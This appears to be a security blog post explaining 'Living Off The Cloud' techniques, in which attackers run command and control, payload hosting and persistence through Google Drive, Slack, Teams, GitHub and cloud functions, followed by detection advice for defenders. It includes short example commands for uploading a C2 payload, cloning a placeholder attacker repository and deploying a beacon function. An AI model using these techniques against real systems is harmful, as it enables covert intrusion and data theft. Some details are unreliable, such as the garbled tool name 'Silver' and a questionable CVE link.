Cyber threats today no longer rely on flashy malware or sketchy infrastructure. Modern adversaries especially Advanced Persistent Threats (APTs) are turning to trusted cloud services to operate invisibly. This technique is called Living Off The Cloud (LOTC). and it’s rapidly becoming a staple of Red Team and nation-state toolkits.

Just like Living Off the Land (LOTL) involves using native OS tools, LOTC uses cloud-based infrastructure you probably already trust.

Cloud services are:

• Widely used and trusted: Firewalls and proxies often allow their traffic.
• Encrypted by default: Most use HTTPs, making inspection harder.
• Hard to blacklist: You can’t just block Google or Microsoft in most organizations.
• Globally available: Attackers don’t need infrastructure, just an account.

Command and Control via Google Drive or Dropbox

TTP Flow:

• Attacker drops payloads into shared cloud folder.
• Infected host polls folder every 30s via scheduled task or beacon.
• Exfiltrated data (e.g., screenshots, keystrokes) uploaded as new files.

Tools:

• Silver + Google Drive API
• gdrive: CLI for file uploads/downloads

gdrive upload C2_payload.exe
gdrive download --path /tmp tasking.json

Why it works: Google Drive traffic blends in with normal productivity behavior.

Slack or Microsoft Teams as C2 Channels

TTP Flow:

• Slack bot posts commands in a private channel.
• Compromised endpoints polls the channel and executes.
• Output posted back as messages.

Abuse Example:

Slack webhook: https://hooks.slack.com/services/XXXX/YYYY/ZZZZ

GitHub PoC:

• slack-shell
• TeamC2 abusing Microsoft Teams (CVE-2023–23397 related abuse scenario)

Reference:

APT29 allegedly used Microsoft Teams to deliver malware-laced documents via chat in a 2023 attack

Bonus: Many orgs run Slack in-browser or as a native app again, trusted traffic.

Payload Hosting via GitHub Repositories

GitHub repositories (public or private) can host:

• Encrypted payloads or scripts
• Infrastructure-as-code (IaC) templates for dynamic infrastructure.
• Configuration files used by implants
• HTTPS and CDN delivery

Tool Example:

• gitC2: C2 over GitHub repos.

git clone https://github.com/attacker/payloads.git
gpg --decrypt payload.bin.gpg

Persistence via Cloud Functions

Cloud functions allow event-driven execution in the cloud. Perfect for stealthy persistence.

Platforms:

• AWS Lambda
• Google Cloud Functions
• Azure Functions

Red Team Use:

• Trigger C2 beacon on HTTP request
• Inject shellcode into warm function containers
• Auto-deploy second-stage payloads

gcloud functions deploy beacon --runtime python39 --trigger-http

Defending against LOTC is challenging, but not impossible. Here’s what Blue Teams and defenders should be doing:

Monitor for Anomalous Cloud Services

• OAuth token abuse: Unknown apps with high permissions
• Personal cloud storage: Used from corporate devices
• API usage spikes: Especially to Slack, GitHub, Dropbox

Inspect DNS and HTTPs Metadata

Even if payloads are encrypted, patterns like:

• Repeated traffic to non-standard subdomains
• Odd timing patterns (e.g., beaconing every 30s)
• Known cloud URLs used in unusual ways

Logs Everything You Can

• Enable audit logs on cloud platforms (e.g., Google Workspace, M365)
• Monitor file sharing activity and access patterns.
• Look for out-of-place automation, like rogue bots, unknown Lambda functions, GitHub webhook abuses.

Analyze DNS + HTTPS Metadata

Even if payloads are encrypted, behaviours reveal intent:

with the rise of GenAI and Cloud, imagine:

• GPT-generated phishing via Microsoft 365
• Dynamic payload generation hosted on GitHub Actions
• AI-controlled implants communicating via AI API (e.g., OpenAI, Anthropic)

Simulated Red Team scenario using cloud-based C2

Check out:

• Mythic C2 Framework:

• Silver C2:

• Red Canary’s Atomic Red Team Cloud TTPs: